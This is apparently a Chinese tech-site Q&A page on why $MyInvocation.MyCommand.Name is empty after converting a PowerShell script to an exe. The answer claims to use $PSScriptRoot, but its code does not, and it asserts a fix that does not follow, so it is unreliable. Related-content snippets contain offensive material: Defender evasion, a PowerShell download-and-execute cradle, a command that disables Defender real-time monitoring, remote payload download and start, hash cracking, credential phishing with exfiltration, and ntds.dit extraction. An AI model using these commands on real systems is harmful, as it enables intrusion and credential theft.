首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

将ps1转换为exe后,$MyInvocation.MyCommand.Name返回空值

将ps1脚本文件转换为exe可执行文件后,使用$MyInvocation.MyCommand.Name返回空值的原因是因为在转换过程中,脚本的元数据和路径信息可能会发生改变,导致无法正确获取脚本的名称。

一种可能的解决方法是使用$PSScriptRoot变量来获取当前脚本的绝对路径,然后使用[System.IO.Path]::GetFileNameWithoutExtension方法获取脚本的名称。修改后的代码如下:

代码语言:txt
复制
$scriptPath = Split-Path -Parent $MyInvocation.MyCommand.Path
$scriptName = [System.IO.Path]::GetFileNameWithoutExtension($MyInvocation.MyCommand.Path)

Write-Host "脚本路径:$scriptPath"
Write-Host "脚本名称:$scriptName"

这样可以确保无论脚本是ps1文件还是转换后的exe文件,都能正确获取脚本的名称。

此外,腾讯云提供了一系列与云计算相关的产品,如云服务器、云数据库、云存储等。根据具体的需求,可以选择适合的腾讯云产品进行部署和管理。更多关于腾讯云的产品介绍和相关链接,请访问腾讯云官方网站:https://cloud.tencent.com/

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

〖免杀〗.net程序一键免杀Win10 20H2 Defender「建议收藏」

去年发布的Ladon 7.5的GUI版本开始就提供有一些PowerShell加密混淆方法,也包含了EXEPowerShell,PowerShellEXE功能,也发布过如何EXE转成PowerShell...的教程,以免杀最新版Ladon为例,首先将ladon.exe拖放至exe/dll(.net)文本框中,然后点击右边的”EXE->PowerShell”按钮,成功会生成Ladon.ps1,如果你只打算把PS1...放在win10机器上使用,也可以Ladon40.exe,毕竟有几个模块只支持.net4.0,当然转换其它.NET程序也一样。...若是Ladon请使用记事本打开ps1文件,复制红线所示@和@里的字符串很长可能有2M 再打开Ladon9.0.ps1或Ladon9.1.ps1找到里面那个很长的加密字符串,刚转换的加密字符串粘贴替换..._8.PNG)] 若发现哪些模块不可使用,可自行参考WIKI,缺少的模块名称参数加入 转换完成,我们再测一下20H2的Defender,免杀成功,可以嗨起来了。

2K10
  • 针对黑客的Windows文件传输总结

    这项技术的一个很酷的事情是我们还获得了用户 NetNTLMv2 哈希的副本。如果我们能够利用不需要知道用户密码的漏洞来立足,我们就可以破解这个哈希并获得明文密码。...提示像之前一样挂在两侧,几秒钟我们可以使用CTRL + C取消与攻击者计算机的连接。...“ -s ”开关用于设置攻击者计算机上的目录,可用于直接在受害者上执行 PS1 脚本。 为 PS1 脚本和二进制文件 (EXE) 设置目录允许我们将它们从攻击者计算机直接执行到受害者的内存中。...最重要的是,这是不需要下载文件或文件传输给受害者来完成的。 如果您的 EXEPS1 脚本位于同一目录中,则为两个开关设置相同的目录。...PS1 脚本加载到evil-winrm 会话中就像按名称执行任何脚本一样简单。由于-s开关指向我们的脚本目录,因此我们可以双击来查看所有可用的 PS1 脚本。

    62411

    【STM32H7的DSP教程】第16章 DSP功能函数-数据拷贝,数据填充和浮点定点

    mod=viewthread&tid=94547 第16章       DSP功能函数-数据拷贝,数据填充和浮点定点 本期教程主要讲解功能函数中的数据拷贝,数据填充和浮点数转换为定点数。...void arm_float_to_q31(   const float32_t * pSrc,   q31_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...arm_var_q31(   const q31_t * pSrc,         uint32_t blockSize,         q31_t * pResult) 函数描述: 这个函数用于浮点数转换为...函数原型: void arm_float_to_q7(   const float32_t * pSrc,   q7_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...* 形 参: 无 * : 无 ***********************************************************************

    1.3K20

    【STM32F407的DSP教程】第16章 DSP功能函数-数据拷贝,数据填充和浮点定点

    mod=viewthread&tid=94547 第16章       DSP功能函数-数据拷贝,数据填充和浮点定点 本期教程主要讲解功能函数中的数据拷贝,数据填充和浮点数转换为定点数。...void arm_float_to_q31(   const float32_t * pSrc,   q31_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...arm_var_q31(   const q31_t * pSrc,         uint32_t blockSize,         q31_t * pResult) 函数描述: 这个函数用于浮点数转换为...函数原型: void arm_float_to_q7(   const float32_t * pSrc,   q7_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...* 形 参: 无 * : 无 ***********************************************************************

    71020

    【STM32F429的DSP教程】第16章 DSP功能函数-数据拷贝,数据填充和浮点定点

    mod=viewthread&tid=94547 第16章       DSP功能函数-数据拷贝,数据填充和浮点定点 本期教程主要讲解功能函数中的数据拷贝,数据填充和浮点数转换为定点数。...void arm_float_to_q31(   const float32_t * pSrc,   q31_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...arm_var_q31(   const q31_t * pSrc,         uint32_t blockSize,         q31_t * pResult) 函数描述: 这个函数用于浮点数转换为...函数原型: void arm_float_to_q7(   const float32_t * pSrc,   q7_t * pDst,   uint32_t blockSize) 函数描述: 这个函数用于浮点数转换为...* 形 参: 无 * : 无 ***********************************************************************

    62910

    2.PS编程入门基础语法

    PS会将命令执行的结果文本按每一行作为元素存为数组,在命令的返回不止一个结果时,PS也会自动把结果存储为数组。...判断一个变量是否为数组 "WeiyiGeek" -is [array] # 它是一个字符串类型 False "WeiyiGeek".toCharArray() -is [array] True # 1.PS命令执行返回的结果存入到数组之中...]] $str = @() $str += "Name" $str += "is" $str += "WeiyiGeek" $str += 1024 # 这里由于强制类型的作用(会将1024换为字符串而非整形...www.weiyigeek.top # www.weiyigeek.top tryReverse -try $true -source www.weiyigeek.top # pot.keegiyiew.www 函数...描述: PS 它的函数可以有多个返回, 如果你直接调用函数,返回会在控制台输出,当然我们通常是结果存储在一个变量中进一步处理。

    12.6K60

    干货 | 网络安全之渗透实战学习笔记总结

    Windows尝试使用用户名和密码对该共享进行身份验证。 在验证过程中,随机的8字节质询密钥会从服务器发送到客户端,散列的NTLM / LANMAN密码再次使用这个质询密钥进行加密。...获取到NTLM,下一步尝试破解。...hash破解: john --format=lm hash.txt hashcat -m 3000 -a 3 hash.txt NThash NTLM是现在Windows系统上存储密码的方式,可以通过储...> hack.exe 接收反弹; 利用evil-winrm上传hack.exe,运行; 程序会报错且会话中断,迁移下进程,再次尝试; 需要事先上传ps1脚本到主机对应的位置,否则找不到脚本;!...notepad.exe 远程执行ps1脚本 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly

    1.7K20

    powershell学习备忘

    在 Process 块完成,$Input 的为 NULL。如果函数没有 Process 块,则 $Input 的可用于 End 块,它包含函数的所有输入。...标量输入提交给 -match 或 -notmatch 运算符时,如果检测到匹配,则会返回一个布尔, 并使用由所有匹配字符串组成的哈希表填充 $Matches 自动变量。...$NULL 包含 NULL 或空。可以在命令和脚本中使用此变量表示 NULL,而不是使用字符串”NULL”。 如果该字符串转换为非空字符串或非零整数,则可将该字符串解释为 TRUE。...ConvertTo-Html: Microsoft .NET Framework 对象转换为可在 Web 浏览器中显示的 HTML。...Export-Csv: Microsoft .NET Framework 对象转换为一系列以逗号分隔的、长度可变的 (CSV) 字符串,并将这些字符串保存到一个 CSV 文件中。

    12.4K60

    四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

    例如: linux:ls cmd:dir 如果只获取其中的name、mode,则使用如下指令。...://192.168.10.11/test.exe','test.exe');start-process test.exe CMD窗口下载文件并执行ps1脚本 powershell -c IEX (New-Object...powershell Set-MpPreference -disablerealtimeMonitoring $true 在CMD窗口下执行,远程主机上的test.exe下载到本地。...unzip PowerSploit-master.zip 解压的文件如下图所示: 第三步,解压的文件夹移动到/var/www/html目录,然后搭建一个简易的服务器。...PE文件(DLL / EXE)反射加载到powershell进程中,或反射地DLL注入远程进程 Invoke-Shellcode.ps1 shellcode插入您选择的进程ID或本地PowerShell

    3.2K30

    成功实现MDK自动生成hex文件的crc并附加到hex文件末尾(bin也支持),然后跟STM32的硬件CRC计算做比较

    【操作步骤】 注意,我是按照我们的工程操作的,其它工程大家自行做适配,推荐CRC放在扇区末尾,方便程序设计和配置。...1、下载此贴里面的RTX5 BOOT例子:链接 2、srec_cat.exe文件,放在路径\Project\MDK-ARM(AC5) 3、在原有的批处理文件CopyHex_Flash.bat...3、程序里面添加如下硬件CRC校验: 配置好系统时钟,就可以调用此函数验证当前程序的完整性。...**************** * 函 数 名: BootHexCrcVeriy * 功能说明: 程序完整性校验 * 形 参: 无 * ...核心就是软件计算的CRC和STM32的硬件CRC数值一样即可 【后续】 在原来程序的基础上再添加一个生成的output_crc.hex文件转换为bin文件。

    3K20

    如何使用 PowerShell 钓鱼获取用户密码

    请注意凭据在 Windows 安全提示中提交立即传送到攻击者的 DNS 服务器。...它将凭据中的每个字符转换为其各自的十六进制转换分解为预定义的块,并将这些块放入流行网站的子域中。以下屏幕截图是十六进制形式的泄露凭据示例。...可配置选项以变量的形式位于 PS1 脚本的顶部,以避免冗长的命令行参数。 第一行是最重要的,因为它定义了泄露数据的交付位置(即攻击者的 Kali 服务器)。...为避免怀疑, 1 是默认。该 delayPrompts 变量定义了每个提示之间的秒数(如果 maxTries 大于 1)。...它利用Windows Defender 中包含的二进制文件“ ConfigSecurityPolicy.exe ”向攻击者的服务器提供凭据。

    5.8K10

    怎么在Linux中自定义bash命令提示符

    在 Linux 中自定义 bash 命令提示符 在 bash 中,我们可以通过更改 $PS1 环境变量的来自定义 bash 命令提示符。 一般情况下,bash 命令提示符会是以下这样的形式: ?...只需要编辑 ~/.bashrc 文件: $ vi ~/.bashrc 在文件的最后添加一行: PS1="ostechnix " 将上面的 “ostechnix” 替换为任意一个你想使用的单词,然后按...再来看看另一个例子,比如 “username@hostname” 替换为 “Hello@welcome ”。 同样是像刚才那样修改 ~/.bashrc 文件。...export PS1=Hello@welcome 然后执行 source ~/.bashrc 让修改结果立即生效。 以下是我在 Ubuntu 18.04 LTS 上修改的效果。 ?...例如,下面这一行配置可以令某些文本的颜色变成红色: export PS1="u@[e[31m]h[e[m] " 添加配置,执行 source ~/.bashrc 立即生效。

    2.8K30

    使用卷影拷贝服务提取 ntds.dit 的多种姿势

    它还包括域中所有用户的密码哈希。为了进一步保护密码哈希,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希进行加密。 我们拿到Ntds.dit就能获取到域内所有用户的hash。... ntds.dit 拖回本地,在目标机器上将 test 文件夹删除,命令如下: rmdir /s/q test ?...通过该脚本,可以 SAM、SYSTEM,ntds.dit 复制到与ps1脚本相同的目录。 使用 diskshadow 导出 ntds.dit 查看帮助信息: diskshadow.exe /? ?...在渗透中可以使用 diskshadow.exe 来执行命令,例如需要执行的命令exec c:\windows\system32\calc.exe写入C盘目录下的command.txt文件: ?...脚本执行,要检查从快照中复制出来的 ntds.dit 文件大小。如果文件大小发生了改变,可以检查或修改脚本重新执行。

    3.1K10
    领券